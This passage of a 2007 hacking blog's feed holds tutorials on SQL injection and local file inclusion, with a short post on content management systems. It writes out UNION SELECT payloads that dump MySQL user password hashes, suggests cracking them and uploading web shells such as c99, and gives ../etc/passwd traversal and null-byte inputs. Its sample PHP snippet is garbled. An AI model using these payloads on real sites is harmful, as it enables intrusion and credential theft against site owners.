class="style6"&gt;1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We are still rolling........&lt;br /&gt;&lt;br /&gt;So i will inject a crafted query like this &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;www.sitevulnerable.com/index.php&lt;span class="style6"&gt;?id=-1union select 4,DATABASE(),2,USER()/*&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="style6"&gt;And the error i get will be the user name in the DB.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="style6"&gt;root@localhost&lt;br /&gt;&lt;br /&gt;So lets grep the password from the db&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;www.sitevulnerable.com/index.php&lt;span class="style6"&gt;?id&lt;/span&gt;=-1 union select host,host,2,password from mysql.user/*&lt;br /&gt;&lt;br /&gt;And our error is&lt;br /&gt;&lt;br /&gt;&lt;span class="style4"&gt;localhost&lt;/span&gt;&lt;br /&gt;       &lt;br /&gt;          &lt;span class="style6"&gt;500372d40e775a87&lt;br /&gt;&lt;br /&gt;Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.&lt;br /&gt;&lt;br /&gt;Download from here&lt;/span&gt;&lt;br /&gt;&lt;span class="style6"&gt;&lt;br /&gt;http://www.openwall.com/john/&lt;br /&gt;&lt;br /&gt;So if i get the password, how will i log in to db and upload my files?&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="style6"&gt;Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet&lt;br /&gt;&lt;br /&gt;A simple screenshot is done below.&lt;br /&gt;&lt;/span&gt;&lt;span class="style6"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_afH8IKGSEeI/RiX2XOEEzXI/AAAAAAAAAAU/6UQVKBCzw1Q/s1600-h/simple+login+using+c100shell+to+db.png"&gt;&lt;img style="cursor: pointer; width: 591px; height: 428px;" src="http://bp3.blogger.com/_afH8IKGSEeI/RiX2XOEEzXI/AAAAAAAAAAU/6UQVKBCzw1Q/s400/simple+login+using+c100shell+to+db.png" alt="" id="BLOGGER_PHOTO_ID_5054717035565862258" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hope this helped, signing off,&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3998542914900441742?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3998542914900441742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3998542914900441742' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3998542914900441742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3998542914900441742'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/04/sql-injections.html' title='SQL INJECTIONS'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_afH8IKGSEeI/RiX2XOEEzXI/AAAAAAAAAAU/6UQVKBCzw1Q/s72-c/simple+login+using+c100shell+to+db.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6633912830195489727</id><published>2007-04-17T17:53:00.000+03:00</published><updated>2007-04-18T11:56:34.468+03:00</updated><title type='text'>EXPLAINING CONTENT MANAGEMENT SYSTEMS</title><content type='html'>A content management system is an application that is accessed with a webbrowser (mozilla firefox, Opera, konqueror etc) over a network like Internet or through the intranet. We actually call them webapplications.and thats where we start talking about webapplication security.&lt;br /&gt;&lt;br /&gt;We use these webaplications for webmails, online retail sales, online auctions, wikis, weblogs, discussion boards(forums) and alot of others.&lt;br /&gt;&lt;br /&gt;Content Management System simplifies the work of the administrators on a site, when it comes to stuff like editing processes, creating, translations, publishing, archiving and alot more better services.&lt;br /&gt;&lt;br /&gt;Errors and bugs found are released everyday including hacked frameworks, new and zero day exploits, and people are made aware of them and patches released. To learn more about webapplication security, you can check www.webappsec.org, a site i always visit several times a day. Others are like www.owasp.org, www.spidynamics.com, www.acunetix.com, www.cgisecurity.com&lt;br /&gt;&lt;br /&gt;Most of the Content Management Softwares i know of, are opensource, so free for anybody who wants to have a website which really sings..........&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6633912830195489727?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6633912830195489727/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6633912830195489727' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6633912830195489727'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6633912830195489727'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/04/explaining-content-management-systems.html' title='EXPLAINING CONTENT MANAGEMENT SYSTEMS'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-2621321632808261083</id><published>2007-04-12T10:27:00.000+03:00</published><updated>2007-04-17T14:07:39.231+03:00</updated><title type='text'>LOCAL FILE INCLUSION</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_afH8IKGSEeI/Rh3h2OcKPaI/AAAAAAAAAAM/OQWtfTAuU8Y/s1600-h/lfi.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_afH8IKGSEeI/Rh3h2OcKPaI/AAAAAAAAAAM/OQWtfTAuU8Y/s320/lfi.png" alt="" id="BLOGGER_PHOTO_ID_5052442678684958114" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;LOCAL FILE INCLUSION&lt;br /&gt;&lt;br /&gt;Local file inclusion is when you view 1 of the remote systems local files through one of their web based scripts normally, e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd? which if on a unix/Linux system will bring up the passwd file.&lt;br /&gt;&lt;br /&gt;Its normally found in webapplications who's input isn't sanitised properly.http://www.victim.com/vulnerablescript.php=2&lt;br /&gt;&lt;br /&gt;Now this is like a GET parameter request for 2 on the above URL. Lfi works with the following&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Nullbytes: %00&lt;br /&gt;- Directory transversal: /../&lt;br /&gt;&lt;br /&gt;Lets assume the vulnerable script looks as this;&lt;br /&gt;&lt;br /&gt;&lt;?&lt;br /&gt;$file=$_GET["file"]; //Get parameter&lt;br /&gt;include(".vuln/$vulnerable.php") //include Get parameter with folder prefix&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As we all know, the GET parameter is passed to the include fuction, which then loads the file, linking up to the full path; /home/www/anotherfile/application/vulnerablescript.php&lt;br /&gt;&lt;br /&gt;Even, as far as PHP is concerned, it has a way of allowing upload of files to the box template folder, which will turn from LFI to RFI. RFI is a short name of Remote File Inclusion. This will happen if  allow_url_fopen is enabled, which due to these vulnerabilities, it will be disabled in PHP 6. You can read more about uploading in php here, http//au.php.net/manual/en/features.file-upload&lt;br /&gt;&lt;br /&gt;So to check if our exploit works we load up the vulnerable script up the url, and feed in a LFI, check this out.....&lt;br /&gt;&lt;br /&gt;www.victimsite.com/vulnerablescript.php=../vulnerablescript.php&lt;br /&gt;&lt;br /&gt;......and if it reloads, the site is vulnerable to LFI&lt;br /&gt;&lt;br /&gt;What will happen in the background is something like this&lt;br /&gt;&lt;br /&gt;/home/www/anotherfile/application/vuln/../vulnerablescript.php&lt;br /&gt;&lt;br /&gt;Now this is a simple directory transversal&lt;br /&gt;&lt;br /&gt;Nullbytes come into play if .php is closed up to the file and helps to ignore everything except %00, so if u do vulnerablescript.php%00, everything after .php is ignored.&lt;br /&gt;&lt;br /&gt;Remember most of our sites have so many security holes u would be amazed, especially if the box is in the same LAN the company or the institution is. Another way of acting gone in 60 seconds huh!&lt;br /&gt;&lt;br /&gt;The screenshot below shows an LFI.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Will be writing more soon on websecurity.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-2621321632808261083?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/2621321632808261083/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=2621321632808261083' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2621321632808261083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2621321632808261083'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/04/local-file-inclusion.html' title='LOCAL FILE INCLUSION'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_afH8IKGSEeI/Rh3h2OcKPaI/AAAAAAAAAAM/OQWtfTAuU8Y/s72-c/lfi.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6975492372905257434</id><published>2007-04-11T16:23:00.000+03:00</published><updated>2007-04-11T16:30:59.629+03:00</updated><title type='text'>IT SECURITY IN MY COUNTRY</title><content type='html'>Hi.&lt;br /&gt;&lt;br /&gt;In my country computer security is not much of an issue, as far as Administration is concerned. You will find how simpler  to break in and how Vulnerable big companies and Goverment institution networks are. So i wish to use this blog to address I.T security and Websecurity as a whole. How far a rabbit hole can be and a little on Exploits and Vulnerability as a whole.&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6975492372905257434?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6975492372905257434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6975492372905257434' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6975492372905257434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6975492372905257434'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/04/it-security-in-my-country.html' title='IT SECURITY IN MY COUNTRY'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry></feed>
